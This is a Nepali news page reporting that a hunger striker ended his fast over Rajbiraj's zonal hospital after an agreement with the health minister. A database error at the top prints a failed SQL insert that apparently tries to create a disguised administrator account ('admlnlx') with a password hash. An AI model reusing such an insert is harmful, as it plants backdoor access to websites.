WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7wOUOLR5JQO.ZWrNScUTMvPNkAYY41', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:08:40', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर २५-
राजविराजस्थित सगरमाथा अञ्चल अस्पताल सुधारको माग गर्दै १८ दिनदेखि अनशनरत विकाश तिवारीले अनशन तोडेका छन् । स्वास्थ्य मन्त्री गगन थापाको रोहबरमा ४ बुँदे सम्झौता गर्दै उनले शनिबार अनशन तोडेका हुन् । तिवारीले ७ महिनाकी कुपोषित बालिका निलम मण्डलको हातबाट जुस पिएर अनशन तोडेका हुन् ।
उनका माग सम्बोधन गर्न राजविराज पुगेका स्वास्थ्य मन्त्री थापाले प्रमुख विशेषज्ञको अध्यक्षतामा उच्चस्तरिय समिति गठन गरेका छन् । सो समितिले अञ्चल अस्पतालमा भएका अनियमितता र भावी कार्ययोजनाबारे एक महिना भित्र मन्त्रालयलाई प्रतिवेदन बुझाउनेछ । मन्त्री थापाले तिवारीसँग एक महिना भित्र अस्पतालमा विशेषज्ञ चिकित्सकसहित खाली रहेका दरबन्दीमा पदपूर्ती गर्ने सहमति गरेका छन् । यसैगरी स्थानिय प्रशासनले हरेक साता अस्पतालको अनुगमन गर्ने भएको छ । तिवारीका माग सम्बोधन गर्न मन्त्री थापासहित मन्त्रालयका वरिष्ठ जनस्वास्थ्य प्रशासकसहितको टोली राजविराज पुगेको थियो ।